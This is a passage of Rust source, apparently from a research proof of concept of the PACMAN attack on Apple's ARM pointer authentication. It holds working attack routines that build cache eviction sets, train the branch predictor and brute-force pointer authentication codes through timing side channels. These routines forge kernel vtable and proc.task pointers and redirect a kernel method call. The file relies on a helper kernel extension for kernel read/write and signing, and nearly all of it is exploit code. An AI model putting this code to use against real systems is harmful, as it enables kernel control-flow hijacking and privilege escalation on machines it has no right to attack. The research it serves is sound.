740 | */ 741 | pub unsafe fn data_testing(memory_region: &mut [u8], do_bruteforce: bool) { 742 | // Handle is used for interfacing with PacmanKit 743 | let handle = PacmanKitConnection::init().unwrap(); 744 | 745 | // Victim handle gives us a victim IOUserClient to exploit 746 | let victim_handle = PacmanKitConnection::init().unwrap(); 747 | 748 | // Locate target object 749 | let (victim_user_client, victim_object, victim_vtable, victim_vtable_entry) = find_victim_objects(&victim_handle); 750 | 751 | // Setup fake vtable (bring it into the cache) 752 | let new_vtable = handle.kernel_mmap().unwrap() | PAC_BITMASK; 753 | handle.kernel_read(new_vtable).unwrap(); 754 | 755 | // Original value to put in [victim_object]: 756 | let original_signed_vtable_ptr = victim_vtable; 757 | 758 | // Correct PAC we want to find: 759 | let salt_data = get_salt(victim_object | PAC_BITMASK, 0xd986); 760 | let correct_signed_new_vtable_ptr = handle.forge_sign_data(new_vtable | PAC_BITMASK, salt_data).unwrap(); 761 | let correct_pac = pac::extract_pac(correct_signed_new_vtable_ptr); 762 | 763 | // Setup evset for LIMIT 764 | let limit_va = handle.leak_limit_location().unwrap(); 765 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 766 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 767 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 768 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 769 | 770 | // Setup evset for the vtable (success data pointer) 771 | let new_vtable_va = new_vtable; 772 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 773 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 774 | let mut new_vtable_evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 775 | let mut 
new_vtable_indexes : Vec = (0..new_vtable_evset_chosen.len()).collect(); 776 | 777 | let try_speculative = || { 778 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 779 | }; 780 | 781 | let try_nonspeculative = || { 782 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 783 | }; 784 | 785 | let target = PacmanAttackTarget::Direct( 786 | DirectTarget{ 787 | holder: victim_object, 788 | train_ptr: original_signed_vtable_ptr, 789 | guess_ptr: new_vtable | PAC_BITMASK, 790 | } 791 | ); 792 | 793 | if !do_bruteforce { 794 | // Generate an incorrect PAC to compare against 795 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 796 | let incorrect_signed_new_vtable_ptr = pac::encode_pac(incorrect_pac, correct_signed_new_vtable_ptr | PAC_BITMASK); 797 | 798 | assert_ne!(correct_pac, incorrect_pac); 799 | assert_ne!(correct_signed_new_vtable_ptr, incorrect_signed_new_vtable_ptr); 800 | 801 | // Try just one correct and one incorrect, see if we can tell them apart: 802 | println!("Forging vtable pointer in PacmanKitService"); 803 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", original_signed_vtable_ptr, pac::extract_pac(original_signed_vtable_ptr)); 804 | println!("\tCorrect new pointer: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_ptr, pac::extract_pac(correct_signed_new_vtable_ptr)); 805 | println!("\tIncorrect new pointer: 0x{:X} (pac is 0x{:X})", incorrect_signed_new_vtable_ptr, pac::extract_pac(incorrect_signed_new_vtable_ptr)); 806 | pacman_differentiate::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 807 | &handle, 808 | target, 809 | correct_signed_new_vtable_ptr, 810 | incorrect_signed_new_vtable_ptr, 811 | timer::time_access, 812 | try_speculative, 813 | try_nonspeculative, 814 | &new_vtable_evset_chosen, 815 | &mut new_vtable_indexes, 816 | &limit_evset_chosen, 817 | &mut limit_indexes 818 | ); 819 | } 820 | else { 821 | println!("Brute-forcing vtable pointer in 
PacmanKitService"); 822 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", original_signed_vtable_ptr, pac::extract_pac(original_signed_vtable_ptr)); 823 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_ptr, pac::extract_pac(correct_signed_new_vtable_ptr)); 824 | pacman_bruteforce::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_NUM_FINAL_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 825 | &handle, 826 | target, 827 | timer::time_access, 828 | try_speculative, 829 | try_nonspeculative, 830 | &new_vtable_evset_chosen, 831 | &mut new_vtable_indexes, 832 | &limit_evset_chosen, 833 | &mut limit_indexes 834 | ); 835 | } 836 | } 837 | 838 | /** 839 | * Instruction version of the PACMAN attack. 840 | */ 841 | pub unsafe fn inst_testing(memory_region: &mut [u8], do_bruteforce: bool) { 842 | // Handle is used for interfacing with PacmanKit 843 | let handle = PacmanKitConnection::init().unwrap(); 844 | 845 | // Victim handle gives us a victim IOUserClient to exploit 846 | let victim_handle = PacmanKitConnection::init().unwrap(); 847 | 848 | // Locate target object 849 | let (victim_user_client, victim_object, victim_vtable_original, victim_vtable_entry) = find_victim_objects(&victim_handle); 850 | 851 | // Setup fake vtable with data PAC oracle (later we will use PACMAN for this too) 852 | // We are trying to guess the correct value INSIDE the vtable (not the vtable ptr itself) so it's ok to "cheat" here 853 | // as long as we use the data PACMAN attack to find this value in the real attack. 854 | // So the data attack needs to produce exactly one value (new_vtable_signed). 855 | let new_vtable = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x24c940; 856 | let new_vtable_salt = get_salt(victim_object | PAC_BITMASK, 0xd986); 857 | let new_vtable_signed = handle.forge_sign_data(new_vtable, new_vtable_salt).unwrap(); 858 | 859 | // Locate win() somewhere in the kernel retpoline (now a NOP sled!) 
860 | let win = handle.leak_retpoline().unwrap() | PAC_BITMASK + 0x30c0; 861 | 862 | // This is the salt to use for any pointers put into the forged vtable: 863 | let salt_inst = get_salt(new_vtable | PAC_BITMASK, 0xa7d5); 864 | 865 | // Correct PAC we want to find: 866 | let correct_signed_new_vtable_entry = handle.forge_sign_inst(win | PAC_BITMASK, salt_inst).unwrap(); 867 | let correct_pac = pac::extract_pac(correct_signed_new_vtable_entry); 868 | 869 | // Setup evset for LIMIT 870 | let limit_va = handle.leak_limit_location().unwrap(); 871 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 872 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 873 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 874 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 875 | 876 | // Setup evset for win() (success inst pointer) 877 | let win_va = win; 878 | let win_pa = handle.kernel_virt_to_phys(win_va).unwrap(); 879 | let win_evset = evset::inst_pevset(win_va, win_pa, memory_region); 880 | let mut win_evset_chosen : Vec = win_evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 881 | let mut win_indexes : Vec = (0..win_evset_chosen.len()).collect(); 882 | 883 | limit_evset_chosen.sort(); 884 | win_evset_chosen.sort(); 885 | 886 | let mut results = [[0; INST_NUM_ITERS]; INST_NUM_TRIALS]; 887 | 888 | // Use a giant retpoline to flush the L1 iCache 889 | let mut retpoline_l1i_as_ptr : *mut u8 = 0 as *mut u8; 890 | let kret = mach::mach_vm_allocate( 891 | mach::mach_task_self(), 892 | &mut retpoline_l1i_as_ptr, 893 | cache::L2_SIZE, 894 | VM_FLAGS_ANYWHERE 895 | ); 896 | 897 | let err_str = CStr::from_ptr(mach_error_string(kret)); 898 | if KERN_SUCCESS != kret { 899 | println!("Error creating L1 iCache retpoline memory region! ({}). 
Error is {:?}", kret, err_str); 900 | return; 901 | } 902 | 903 | // For flush_iCache: 904 | let retpoline_l1i = (retpoline_l1i_as_ptr as u64) & (!PAC_BITMASK); 905 | retpoline::mk_retpoline_addr(retpoline_l1i as u64, cache::L2_SIZE); 906 | 907 | let try_speculative = || { 908 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 909 | }; 910 | 911 | let try_nonspeculative = || { 912 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 913 | }; 914 | 915 | // Forge non-speculatively (for testing): 916 | // handle.kernel_write(victim_vtable, correct_signed_new_vtable_entry); 917 | // try_nonspeculative(); 918 | // loop{} 919 | 920 | let target = PacmanAttackTarget::Indirect( 921 | IndirectTarget{ 922 | outer_holder: victim_object, 923 | inner_holder: new_vtable, 924 | outer_train_ptr: victim_vtable_original, 925 | outer_guess_ptr: new_vtable_signed, 926 | 927 | // This is ignored by differentiate (in favor of the correct/ incorrect ptr args), 928 | // and is the pointer to forge for bruteforce 929 | inner_guess_ptr: win | PAC_BITMASK, 930 | } 931 | ); 932 | 933 | if !do_bruteforce { 934 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 935 | let incorrect_signed_new_vtable_entry = pac::encode_pac(incorrect_pac, win | PAC_BITMASK); 936 | 937 | assert_ne!(correct_pac, incorrect_pac); 938 | assert_ne!(correct_signed_new_vtable_entry, incorrect_signed_new_vtable_entry); 939 | // Try just one correct and one incorrect, see if we can tell them apart: 940 | println!("Forging vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 941 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 942 | println!("\tIncorrect new pointer: 0x{:X} (pac is 0x{:X})", incorrect_signed_new_vtable_entry, pac::extract_pac(incorrect_signed_new_vtable_entry)); 943 | println!("\tCorrect new pointer: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_entry, 
pac::extract_pac(correct_signed_new_vtable_entry)); 944 | pacman_differentiate::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 945 | &handle, 946 | target, 947 | // Inner holder correct/ incorrect: 948 | correct_signed_new_vtable_entry, 949 | incorrect_signed_new_vtable_entry, 950 | timer::time_exec, 951 | try_speculative, 952 | try_nonspeculative, 953 | &win_evset_chosen, 954 | &mut win_indexes, 955 | &limit_evset_chosen, 956 | &mut limit_indexes 957 | ); 958 | } 959 | else { 960 | println!("Brute-forcing vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 961 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 962 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", correct_signed_new_vtable_entry, pac::extract_pac(correct_signed_new_vtable_entry)); 963 | pacman_bruteforce::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_NUM_FINAL_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 964 | &handle, 965 | target, 966 | timer::time_exec, 967 | try_speculative, 968 | try_nonspeculative, 969 | &win_evset_chosen, 970 | &mut win_indexes, 971 | &limit_evset_chosen, 972 | &mut limit_indexes 973 | ); 974 | } 975 | } 976 | 977 | pub unsafe fn end_to_end(memory_region: &mut [u8]) { 978 | // Handle is used for interfacing with PacmanKit 979 | let handle = PacmanKitConnection::init().unwrap(); 980 | 981 | // Victim handle gives us a victim IOUserClient to exploit 982 | let victim_handle = PacmanKitConnection::init().unwrap(); 983 | 984 | // Locate target object 985 | let (victim_user_client, victim_object, victim_vtable, victim_vtable_entry) = find_victim_objects(&victim_handle); 986 | 987 | // Data attack will find new_vtable_signed 988 | let new_vtable = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x24c940; 989 | 990 | // Inst attack will find win_signed 991 | let win = handle.leak_retpoline().unwrap() | PAC_BITMASK + 0x30c0; 992 | 993 | // Setup evset for LIMIT 
994 | let limit_va = handle.leak_limit_location().unwrap(); 995 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 996 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 997 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 998 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 999 | 1000 | // Setup evset for the vtable (success data pointer) 1001 | let new_vtable_va = new_vtable; 1002 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 1003 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 1004 | let mut new_vtable_evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 1005 | let mut new_vtable_indexes : Vec = (0..new_vtable_evset_chosen.len()).collect(); 1006 | 1007 | // Setup evset for win() (success inst pointer) 1008 | let win_va = win; 1009 | let win_pa = handle.kernel_virt_to_phys(win_va).unwrap(); 1010 | let win_evset = evset::inst_pevset(win_va, win_pa, memory_region); 1011 | let mut win_evset_chosen : Vec = win_evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 1012 | let mut win_indexes : Vec = (0..win_evset_chosen.len()).collect(); 1013 | 1014 | // Closures for both attacks 1015 | let try_speculative = || { 1016 | victim_handle.call_service_routine(10000, 0, 0, 0, 0, 0); 1017 | }; 1018 | 1019 | let try_nonspeculative = || { 1020 | victim_handle.call_service_routine(0, 0, 0, 0, 0, 0); 1021 | }; 1022 | 1023 | // 1. DATA ATTACK -> Finds new_vtable_signed 1024 | 1025 | // Print the correct answer to the screen- note that we can never rely on DATA_ORACLE (we must generate the value ourselves!) 
1026 | let salt_data = get_salt(victim_object | PAC_BITMASK, 0xd986); 1027 | let DATA_ORACLE = handle.forge_sign_data(new_vtable | PAC_BITMASK, salt_data).unwrap(); 1028 | println!("Brute-forcing vtable pointer in PacmanKitService"); 1029 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable, pac::extract_pac(victim_vtable)); 1030 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", DATA_ORACLE, pac::extract_pac(DATA_ORACLE)); 1031 | 1032 | let data_target = PacmanAttackTarget::Direct( 1033 | DirectTarget{ 1034 | holder: victim_object, 1035 | train_ptr: victim_vtable, 1036 | guess_ptr: new_vtable | PAC_BITMASK, 1037 | } 1038 | ); 1039 | 1040 | let new_vtable_signed = match pacman_bruteforce::<_, _, DATA_NUM_TRIALS, DATA_NUM_ITERS, DATA_NUM_FINAL_ITERS, DATA_EVSET_SIZE, DATA_MISS_LATENCY>( 1041 | &handle, 1042 | data_target, 1043 | timer::time_access, 1044 | &try_speculative, 1045 | &try_nonspeculative, 1046 | &new_vtable_evset_chosen, 1047 | &mut new_vtable_indexes, 1048 | &limit_evset_chosen, 1049 | &mut limit_indexes 1050 | ) { 1051 | Some(x) => x, 1052 | None => { panic!("Couldn't find the data solution!"); } 1053 | }; 1054 | 1055 | if new_vtable_signed != DATA_ORACLE { 1056 | panic!("Aborting early to prevent your kernel from panicking- the data pointer was INCORRECT!"); 1057 | } 1058 | 1059 | // 2. INST ATTACK -> Finds win_signed for new_vtable 1060 | 1061 | // Print the correct answer to the screen- note that we can never rely on INST_ORACLE (we must generate the value ourselves!) 
1062 | let salt_inst = get_salt(new_vtable | PAC_BITMASK, 0xa7d5); 1063 | let INST_ORACLE = handle.forge_sign_inst(win | PAC_BITMASK, salt_inst).unwrap(); 1064 | 1065 | println!("Brute-forcing vtable entry (PacmanKitService::externalMethod) in PacmanKitService`vtable"); 1066 | println!("\tOriginal pointer: 0x{:X} (pac is 0x{:X})", victim_vtable_entry, pac::extract_pac(victim_vtable_entry)); 1067 | println!("\tWant to find: 0x{:X} (pac is 0x{:X})", INST_ORACLE, pac::extract_pac(INST_ORACLE)); 1068 | 1069 | let inst_target = PacmanAttackTarget::Indirect( 1070 | IndirectTarget{ 1071 | outer_holder: victim_object, 1072 | inner_holder: new_vtable, 1073 | outer_train_ptr: victim_vtable, 1074 | 1075 | // Found by data attack: 1076 | outer_guess_ptr: new_vtable_signed, 1077 | 1078 | // Want to find the correct signature for win(): 1079 | inner_guess_ptr: win | PAC_BITMASK, 1080 | } 1081 | ); 1082 | 1083 | let win_signed = match pacman_bruteforce::<_, _, INST_NUM_TRIALS, INST_NUM_ITERS, INST_NUM_FINAL_ITERS, INST_EVSET_SIZE, INST_MISS_LATENCY>( 1084 | &handle, 1085 | inst_target, 1086 | timer::time_exec, 1087 | &try_speculative, 1088 | &try_nonspeculative, 1089 | &win_evset_chosen, 1090 | &mut win_indexes, 1091 | &limit_evset_chosen, 1092 | &mut limit_indexes 1093 | ) { 1094 | Some(x) => x, 1095 | None => { panic!("Couldn't find the inst solution!"); } 1096 | }; 1097 | 1098 | if win_signed != INST_ORACLE { 1099 | panic!("Aborting early to prevent your kernel from panicking- the inst pointer was INCORRECT!"); 1100 | } 1101 | 1102 | println!("Bruteforced all the way!"); 1103 | 1104 | // Give it a use: 1105 | handle.kernel_write(new_vtable, win_signed); 1106 | handle.kernel_write(victim_object, new_vtable_signed); 1107 | try_nonspeculative(); 1108 | } 1109 | 1110 | pub const SYS_MEMORYSTATUS_AVAILABLE_MEMORY : u64 = 534; 1111 | 1112 | pub static mut PRESSURE_THREAD_STARTED : bool = false; 1113 | 1114 | pub static mut PRESSURE_EVSET : Vec = Vec::new(); 1115 | 1116 | pub unsafe 
fn memorystatus_available_memory() -> u64 { 1117 | let retval : u64; 1118 | asm!{ 1119 | "svc #0", 1120 | in("x8") SYS_MEMORYSTATUS_AVAILABLE_MEMORY, 1121 | in("x16") SYS_MEMORYSTATUS_AVAILABLE_MEMORY, 1122 | lateout("x0") retval, 1123 | } 1124 | return retval; 1125 | } 1126 | 1127 | /// Attack memorystatus_available_memory system call to forge proc.task 1128 | pub unsafe fn pacman_real(memory_region: &mut [u8]) { 1129 | const NUM_ITERS : usize = 8; 1130 | const NUM_TRIALS : usize = 12; 1131 | const MISS_LATENCY : u64 = 62; 1132 | const EVSET_SIZE : usize = 12; 1133 | 1134 | let handle = PacmanKitConnection::init().unwrap(); 1135 | let proc = handle.current_proc().unwrap() | PAC_BITMASK; 1136 | let holder = proc + 0x10; 1137 | let proc_task_original_signed = handle.kernel_read(holder).unwrap(); 1138 | let proc_task_original = handle.kernel_read(holder).unwrap() | PAC_BITMASK; 1139 | 1140 | let proc_task_new = (handle.kernel_mmap().unwrap() | PAC_BITMASK) + 0x4000; 1141 | handle.kernel_read(proc_task_new).unwrap(); 1142 | 1143 | let salt_data = get_salt(holder, 0xa08a); 1144 | let proc_task_new_correct = handle.forge_sign_data(proc_task_new, salt_data).unwrap(); 1145 | 1146 | let correct_pac = pac::extract_pac(proc_task_new_correct); 1147 | let incorrect_pac = correct_pac ^ (crandom::rand() as u16 % pac::MAX_PAC); 1148 | let proc_task_new_incorrect = pac::encode_pac(incorrect_pac, proc_task_new_correct | PAC_BITMASK); 1149 | 1150 | assert_ne!(correct_pac, incorrect_pac); 1151 | assert_ne!(proc_task_new_correct, proc_task_new_incorrect); 1152 | 1153 | // Setup evset for LIMIT (UNUSED HERE) 1154 | let limit_va = proc + 0x560; 1155 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 1156 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 1157 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), LIMIT_EVSET_SIZE).into_iter().cloned().collect(); 1158 | let mut limit_evset_indexes : Vec = 
(0..limit_evset_chosen.len()).collect(); 1159 | 1160 | PRESSURE_EVSET = limit_evset_chosen.clone(); 1161 | 1162 | // Setup evset for the vtable (success data pointer) 1163 | let new_vtable_va = (proc_task_new_correct + 0x338) | PAC_BITMASK; // +0x338 1164 | let new_vtable_pa = handle.kernel_virt_to_phys(new_vtable_va).unwrap(); 1165 | let new_vtable_evset = evset::data_pevset(new_vtable_va, new_vtable_pa, memory_region); 1166 | let mut evset_chosen : Vec = new_vtable_evset.choose_multiple(&mut rand::thread_rng(), EVSET_SIZE).into_iter().cloned().collect(); 1167 | let mut evset_indexes : Vec = (0..evset_chosen.len()).collect(); 1168 | 1169 | println!("{:X?}", evset_chosen); 1170 | // loop{} 1171 | 1172 | println!("Differentiating proc.task"); 1173 | println!("\tproc is at 0x{:X}", proc); 1174 | println!("\tproc.task: 0x{:X}", proc_task_original); 1175 | println!("\tCorrect new pointer: 0x{:X}", proc_task_new_correct); 1176 | println!("\tIncorrect new pointer: 0x{:X}", proc_task_new_incorrect); 1177 | 1178 | let target = PacmanAttackTarget::Direct( 1179 | DirectTarget{ 1180 | holder: holder, 1181 | train_ptr: proc_task_original_signed, 1182 | guess_ptr: proc_task_new | PAC_BITMASK, 1183 | } 1184 | ); 1185 | 1186 | let try_speculative = || { 1187 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1188 | memorystatus_available_memory(); 1189 | }; 1190 | 1191 | let try_nonspeculative = || { 1192 | handle.kernel_write(proc + 0x560, 1).unwrap(); 1193 | memorystatus_available_memory(); 1194 | }; 1195 | 1196 | // DO IT ALL INLINE: 1197 | let correct_ptr = proc_task_new_correct; 1198 | let incorrect_ptr = proc_task_new_incorrect; 1199 | let known_good = proc_task_original_signed; 1200 | let time_use_fn = timer::time_access; 1201 | 1202 | let mut results = [[0; NUM_ITERS]; NUM_TRIALS]; 1203 | 1204 | let mut use_correct_pac = [false; NUM_TRIALS]; 1205 | for i in 0..NUM_TRIALS { 1206 | use_correct_pac[i] = crandom::rand() % 2 == 0; 1207 | } 1208 | 1209 | // Always ensure we get 
one false and one true 1210 | use_correct_pac[0] = false; 1211 | use_correct_pac[1] = true; 1212 | 1213 | // Spawn workers to put pressure on the cache 1214 | for _ in 0..4 { 1215 | thread::spawn(|| { 1216 | if !set_core(CoreKind::PCORE) { 1217 | panic!("Error setting CPU affinity!"); 1218 | } 1219 | write_volatile(&mut PRESSURE_THREAD_STARTED, true); 1220 | loop { 1221 | for i in 0..PRESSURE_EVSET.len() { 1222 | // timer::time_access(limit_evset_chosen_copy[limit_evset_indexes_copy[i]]); 1223 | // timer::time_access has ISBs in the way- we want to go as fast as possible (do as many loads as we can!) 1224 | asm!{ 1225 | "ldr {val_out}, [{addr}]", 1226 | val_out = out(reg) _, 1227 | addr = in(reg) PRESSURE_EVSET[i], 1228 | } 1229 | } 1230 | } 1231 | }); 1232 | } 1233 | 1234 | while !read_volatile(&PRESSURE_THREAD_STARTED) {} 1235 | 1236 | // thread::sleep(core::time::Duration::from_millis(1000)); 1237 | 1238 | for trial in 0..NUM_TRIALS { 1239 | let value_to_use = if use_correct_pac[trial] {correct_ptr} else {incorrect_ptr}; 1240 | let mut samples = [0; NUM_ITERS]; 1241 | 1242 | for iteration in 0..NUM_ITERS+1 { 1243 | // Run a single test case 1244 | 1245 | assert_eq!(evset_chosen.len(), EVSET_SIZE); 1246 | 1247 | // 1. Train branch predictor on known good pointer 1248 | handle.kernel_write(holder | PAC_BITMASK, known_good); 1249 | handle.kernel_write(proc + 0x560, 1).unwrap(); 1250 | for i in 0..4096 { 1251 | memorystatus_available_memory(); 1252 | } 1253 | 1254 | // 2. Write guess 1255 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1256 | handle.kernel_write(holder | PAC_BITMASK, value_to_use); 1257 | 1258 | // 3. Evict LIMIT- this is ALWAYS a data access! 1259 | for i in 0..limit_evset_indexes.len() { 1260 | timer::time_access(limit_evset_chosen[limit_evset_indexes[i]]); 1261 | } 1262 | 1263 | // 4. Prime the cache 1264 | for i in 0..EVSET_SIZE { 1265 | time_use_fn(evset_chosen[evset_indexes[i]]); 1266 | } 1267 | 1268 | // 5. 
Try guess (speculatively) 1269 | memorystatus_available_memory(); 1270 | 1271 | // 6. Probe (go backwards with .rev() if you want to prevent self-eviction!) 1272 | let mut times = [0; EVSET_SIZE]; 1273 | for i in (0..EVSET_SIZE) { 1274 | times[i] = time_use_fn(evset_chosen[evset_indexes[i]]); 1275 | } 1276 | 1277 | // 7. Cleanup nicely 1278 | handle.kernel_write(holder | PAC_BITMASK, known_good); 1279 | handle.kernel_write(proc + 0x560, 0).unwrap(); 1280 | 1281 | // Record the number of misses 1282 | let mut misses = 0; 1283 | for i in 0..EVSET_SIZE { 1284 | if times[i] > MISS_LATENCY { 1285 | misses += 1; 1286 | } 1287 | } 1288 | 1289 | // Skip the first run 1290 | if iteration != 0 { 1291 | samples[iteration-1] = misses; 1292 | } 1293 | } 1294 | results[trial] = samples; 1295 | } 1296 | 1297 | // Post-process and print out results for graphing/ testing 1298 | for i in 0..NUM_TRIALS { 1299 | if use_correct_pac[i] { 1300 | print!("[*] "); 1301 | } 1302 | else { 1303 | print!("[x] "); 1304 | } 1305 | 1306 | results[i].sort(); 1307 | let mut avg : f64 = 0.0; 1308 | let mut total : u64 = 0; 1309 | for j in 0..results[i].len() { 1310 | avg += results[i][j] as f64; 1311 | total += results[i][j] 1312 | } 1313 | avg /= results[i].len() as f64; 1314 | let median = results[i][results[i].len() / 2]; 1315 | let max = results[i][results[i].len() - 2]; 1316 | let min = results[i][2]; 1317 | print!("{}, {}, {}, {}, {}\t", min, median, max, avg, total); 1318 | println!("{:?}", results[i]); 1319 | } 1320 | } 1321 | --------------------------------------------------------------------------------